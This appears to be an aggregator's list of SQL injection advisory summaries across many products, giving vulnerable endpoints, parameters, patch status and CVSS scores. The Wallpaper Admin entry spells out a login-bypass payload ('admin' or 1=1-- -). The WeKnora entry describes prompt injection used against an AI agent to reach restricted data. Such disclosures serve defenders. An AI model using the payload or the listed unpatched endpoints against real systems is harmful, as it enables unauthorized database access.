SQL Injection

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the folderid parameter in /kmf/folder.jsp HTTP requests, potentially leading to unauthorized data access or modification. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response despite early notification.

SQL injection in Yonyou KSOA 9.0 via the folderid parameter in /kmf/edit_folder.jsp allows unauthenticated remote attackers to execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early disclosure notification.

SQL injection in Yonyou KSOA 9.0's /kmc/save_catalog.jsp endpoint allows unauthenticated remote attackers to manipulate the catalogid parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires only network access with no user interaction, enabling potential data exfiltration and unauthorized database modification.

Unauthenticated SQL injection in Yonyou KSOA 9.0 via the ID parameter in the /worksheet/worksadd_plan.jsp endpoint allows remote attackers to execute arbitrary SQL queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. The attack requires no authentication or user interaction and can be exploited over the network.

SQL injection in Yonyou KSOA 9.0's /worksheet/worksadd.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification. The attack requires no user interaction and could enable unauthorized data access, modification, or deletion.

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the ID parameter in the /worksheet/work_report.jsp endpoint, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification.

SQL injection in Yonyou KSOA 9.0's /worksheet/work_mod.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response to disclosure. The attack requires no user interaction and could enable unauthorized data access or modification.

Yonyou KSOA 9.0 contains a SQL injection vulnerability in the /worksheet/work_info.jsp endpoint via an unsanitized ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. The attack requires no user interaction and can result in unauthorized data access, modification, or denial of service.

SQL injection in Yonyou KSOA 9.0's /worksheet/del_workplan.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the ID parameter in the /worksheet/del_work.jsp endpoint, potentially enabling unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.

Society Management System versions up to 1.0 contains a vulnerability that allows attackers to sql injection (CVSS 7.3).

SQL injection in itsourcecode Society Management System 1.0 allows authenticated attackers to manipulate the Title parameter in /admin/add_activity.php, enabling remote data exfiltration, modification, or denial of service. Public exploit code exists for this vulnerability, and no patch is currently available.

SQL injection in EasyCMS up to version 1.6 via the _order parameter in /UserAction.class.php allows unauthenticated remote attackers to manipulate database queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.

SQL injection in FeMiner Warehouse Management System's /src/chkuser.php endpoint allows unauthenticated remote attackers to manipulate the Username parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided patches despite early notification. The flaw affects all versions up to commit 9cad1f1b179a98b9547fd003c23b07c7594775fa and enables attackers to potentially read, modify, or delete sensitive warehouse data.

SQL injection in the REST authentication endpoint of risesoft-y9 Digital-Infrastructure up to version 9.6.7 allows unauthenticated remote attackers to manipulate input parameters and execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not yet released a patch despite early notification. The attack requires no user interaction and can compromise data confidentiality, integrity, and availability.

The Advanced Ads - Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 4.9 MEDIUM]

SQL injection in WeGIA's Atendido_ocorrenciaControle endpoint allows authenticated attackers to manipulate the id_memorando parameter and extract entire databases, exposing sensitive personal information and potentially reading arbitrary files on misconfigured systems. Public exploit code exists for this vulnerability affecting WeGIA versions prior to 3.6.2. A patch is available in version 3.6.2 and should be deployed immediately to affected charitable institution management systems.

Grocery Crud 1.6.4 has a SQL injection vulnerability in the order_by parameter, allowing remote attackers to read, modify, or delete database contents through crafted sort requests.

Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. [CVSS 8.2 HIGH]

Odine Solutions GateKeeper 1.0 contains a SQL injection vulnerability in the trafficCycle API endpoint that allows remote attackers to inject malicious database queries. [CVSS 8.2 HIGH]

A time-based blind SQL Injection vulnerability exists in PHPGurukul Cyber Cafe Management System v1.0 within the adminprofile.php endpoint. [CVSS 8.8 HIGH]

Phpgurukul Cyber Cafe Management System v1.0 has SQL injection in the username parameter of add-users.php. PoC available.

GLPI is a free asset and IT management software package. From 11.0.0, < 11.0.3, an unauthenticated user can perform a SQL injection through the inventory endpoint. [CVSS 7.5 HIGH]

Build Smart ERP 21.0817 contains an unauthenticated SQL injection vulnerability in the 'eidValue' parameter of the login validation endpoint. [CVSS 8.2 HIGH]

Kmaleon 1.1.0.205 contains an authenticated SQL injection vulnerability in the 'tipocomb' parameter of kmaleonW.php that allows attackers to manipulate database queries. [CVSS 7.1 HIGH]

Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint. [CVSS 8.2 HIGH]

An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. [CVSS 6.5 MEDIUM]

An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. [CVSS 4.9 MEDIUM]

The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to blind SQL Injection via the `order` and `append_where_sql` parameters in all versions up to, and including, 1.6.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 7.5 HIGH]

Blind SQL injection in Pimcore's Admin Search Find API allows authenticated attackers to extract database information through inferential techniques, bypassing the incomplete mitigation from a prior patch that only removed comment-based attacks. The vulnerability affects Pimcore versions prior to 12.3.1 and 11.5.14, with public exploit code available. Patched versions are available and should be deployed immediately.

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

The Shipping Rate By Cities plugin for WordPress is vulnerable to SQL Injection via the 'city' parameter in all versions up to, and including, 2.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 7.5 HIGH]

Flat Shipping Rate by City for WooCommerce (WordPress plugin) is affected by sql injection (CVSS 4.9).

The DASHBOARD BUILDER - WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. [CVSS 7.1 HIGH]

WorkOrder CMS 0.1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login by manipulating username and password parameters. [CVSS 8.2 HIGH]

Social-Share-Buttons 2.2.3 contains a critical SQL injection vulnerability in the project_id parameter that allows attackers to manipulate database queries. [CVSS 8.2 HIGH]

Aero CMS 0.0.1 has SQL injection in the author parameter exploitable through boolean-based, error-based, time-based, and UNION query techniques. PoC available.

VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. [CVSS 6.5 MEDIUM]

VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface. [CVSS 8.2 HIGH]

Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. [CVSS 8.2 HIGH]

SQL injection in Microsoft SharePoint Server enables authenticated attackers to execute arbitrary code remotely through improper sanitization of database queries. This vulnerability affects authorized users with network access and could allow them to compromise affected systems with high-level privileges. No patch is currently available for this issue.

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests. [CVSS 7.2 HIGH]

phpgurukul News Portal V4.1 has SQL injection in check_availablity.php. PoC available.

A vulnerability exists in Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 where an SQL injection vulnerability allows authenticated users to execute unintended SQL queries and commands. [CVSS 8.8 HIGH]

GYM-MANAGEMENT-SYSTEM 1.0 has multiple SQL injection vulnerabilities in search and payment endpoints (member_search, trainer_search, gym_search, payment_search). PoC available.

Gym Management System PHP 1.0 has multiple SQL injection vulnerabilities across three files (submit_contact.php, secure_login.php, change_s_pwd.php) through seven parameters. Authentication bypass and data extraction possible.

Kashipara Online Exam System V1.0 has SQL injection in profile.php through five POST parameters (rname, rcollage, rnumber, rgender, rpassword). PoC available.

Imaster's MEMS Events CRM contains an SQL injection vulnerability in ‘phone’ parameter in ‘/memsdemo/login.php’.

Imaster's MEMS Events CRM contains an SQL injection vulnerability in‘keyword’ parameter in ‘/memsdemo/exchange_offers.php’.

Imaster's Patient Records Management System is vulnerable to SQL Injection in the endpoint ‘/projects/hospital/admin/complaints.php’ through the ‘id’ parameter.

Critical SQL injection vulnerability in an internet-exposed service enabling unauthenticated extraction and manipulation of the entire database. CVSS 10.0 with scope change, EPSS 12.9% indicating high exploitation activity.

SQL injection in Online Music Site 1.0's AdminUpdateUser.php allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Successful exploitation could enable unauthorized data access, modification, or deletion with confidentiality, integrity, and availability impact.

SQL injection in code-projects Online Music Site 1.0 via the txtusername parameter in AdminAddUser.php enables unauthenticated remote attackers to manipulate database queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. No patch is currently available.

Intern Membership Management System versions up to 1.0 contains a vulnerability that allows attackers to sql injection (CVSS 4.7).

SQL injection in jjjfood and jjjshop_food PHP applications through the latitude parameter in /index.php/api/product.category/index allows authenticated attackers to execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite notification. Affected installations up to version 20260103 should implement immediate mitigation measures.

WeKnora versions before 0.2.5 allow unauthenticated attackers to bypass database query restrictions through prompt injection techniques when the Agent service is enabled, enabling unauthorized access to sensitive data. Public exploit code exists for this vulnerability, which affects the framework's document understanding and semantic retrieval capabilities. A patch is available in version 0.2.5 and later.

XWiki Full Calendar Macro (before 2.4.5) has SQL injection accessible to guest users via the Calendar.JSONService page. Maximum CVSS 10.0 with scope change. Patch available.

SQL injection vulnerability in pss.sale.com 1.0 via the id parameter to the userfiles/php/cancel_order.php endpoint. [CVSS 6.5 MEDIUM]

Area9 Rhapsode 1.47.3 allows SQL Injection via multiple API endpoints accessible to authenticated users. Insufficient input validation allows remote attackers to inject arbitrary SQL commands, resulting in unauthorized database access and potential compromise of sensitive data. [CVSS 6.5 MEDIUM]

GestSup versions before 3.2.60 allow authenticated attackers to execute SQL injection attacks through insufficiently sanitized filtering and sorting parameters in the asset list functionality, potentially enabling unauthorized database access or modification. The vulnerability requires valid credentials to exploit but has no available patch, leaving affected installations vulnerable to data breach or manipulation depending on database permissions.

GestSup prior to version 3.2.60 is vulnerable to SQL injection in the ticket creation feature, allowing authenticated attackers to execute arbitrary database queries through unsanitized user input. An attacker with valid credentials can read or modify sensitive database contents depending on the database permission level. No patch is currently available.

Authenticated attackers can exploit SQL injection in GestSup's search functionality (versions before 3.2.60) to manipulate database queries and access or modify sensitive data. The vulnerability stems from insufficient input validation on user-controlled search parameters in SQL statements. With no patch currently available, affected organizations should implement database access controls and monitor for suspicious search activity.

A vulnerability was determined in guchengwuyue yshopmall up to 1.9.1. Affected is the function getPage of the file /api/jobs. [CVSS 6.3 MEDIUM]

A vulnerability has been found in RainyGao DocSys up to 2.02.37. This affects an unknown function of the file com/DocSystem/mapping/UserMapper.xml. [CVSS 6.3 MEDIUM]

Docsys versions up to 2.02.36. contains a vulnerability that allows attackers to sql injection (CVSS 6.3).

PHPGurukul Online Course Registration System through version 3.1 contains a SQL injection vulnerability in /enroll.php that allows authenticated attackers to manipulate multiple parameters (studentregno, Pincode, session, department, level, course, sem) to execute arbitrary database queries over the network. Public exploit code exists for this vulnerability, and no patch is currently available, creating risk for deployments handling course enrollment data.

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple SQL injection vulnerabilities exists which allow a low privileged and administrative user to access the database and its content. [CVSS 5.4 MEDIUM]

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user. [CVSS 5.4 MEDIUM]

A vulnerability was detected in RainyGao DocSys up to 2.02.36. The affected element is an unknown function of the file src/com/DocSystem/mapping/GroupMemberMapper.xml. [CVSS 6.3 MEDIUM]

BeeS Software BET Portal has SQL injection in the login functionality, allowing unauthenticated attackers to bypass authentication and extract database contents. PoC available.

This vulnerability allows unauthenticated attackers to inject an SQL request into GET request parameters and directly query the underlying database. [CVSS 7.5 HIGH]

SQL injection in PHPGurukul Online Course Registration System through 3.1 allows authenticated attackers to manipulate the id/cid parameters in the manage-students.php admin function, enabling unauthorized database access and potential data modification. Public exploit code exists for this vulnerability, and no patch is currently available.

SQL injection in the Intern Membership Management System 1.0 add_activity.php file allows authenticated administrators to manipulate the Title parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw enables an authenticated attacker with high privileges to compromise data confidentiality and integrity.

SQL injection in the Intern Membership Management System 1.0 admin deletion function allows authenticated attackers with high privileges to manipulate the admin_id parameter and execute arbitrary database queries remotely. Public exploit code is available for this vulnerability, which affects PHP-based deployments. The vulnerability enables unauthorized data access, modification, and potential denial of service with no patch currently available.

Print Shop Pro WebDesk 18.34 has SQL injection in the hfInventoryDistFormID parameter of GetUnitPrice. Combined with CVE-2025-61546 (negative quantities), this endpoint has two critical vulnerabilities. PoC available, fixed in 19.69.

online-shopping-system-php 1.0 has SQL injection in review_action.php via the proId parameter. PoC available.

SQL injection in Parsl's visualization dashboard allows unauthenticated attackers to execute arbitrary database queries through unsafe string formatting of the workflow_id parameter. Public exploit code exists for this vulnerability, enabling potential data theft or database denial of service attacks against the monitoring infrastructure. The issue affects Parsl versions prior to 2026.01.05, which includes the fix.

Blind SQL injection in CoreShop prior to version 4.1.8 allows authenticated administrators to extract sensitive database information through boolean-based or time-based attack techniques. The vulnerability is limited to information disclosure due to the application's read-only database permissions, preventing data modification or denial of service. Public exploit code exists for this vulnerability; administrators should upgrade to version 4.1.8 or later.

Automotive Listings WordPress theme (through 18.6) has blind SQL injection enabling unauthenticated database extraction.

Lobo WordPress theme (before 2.8.6) has blind SQL injection enabling unauthenticated database extraction.

Felan Framework (through 1.1.3) also has SQL injection in addition to the auth bypass (CVE-2025-23504). Two critical vulnerabilities in the same plugin create a devastating attack chain.

Workreap WordPress plugin (through 3.3.6) has SQL injection enabling unauthenticated database extraction. A freelance marketplace plugin likely containing user PII and financial data.

WooCommerce Orders & Customers Exporter (through 5.4) has SQL injection enabling unauthenticated extraction of all order and customer data including payment details and personal information.

SQL injection in the admin panel of code-projects Intern Membership Management System 1.0 allows authenticated attackers with high privileges to manipulate the Username parameter in /intern/admin/add_admin.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected organizations should restrict administrative access and consider implementing input validation controls or upgrading to a patched version when available.

Intern Membership Management System versions up to 1.0 contains a vulnerability that allows attackers to sql injection (CVSS 7.3).

SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the activity_id parameter in edit_activity.php, potentially leading to unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, though no patch is currently available.

SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_students.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive data. No patch is currently available to remediate this issue.

SQL injection in the Intern Membership Management System 1.0 admin panel allows remote attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_admin.php, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and no patch is currently available.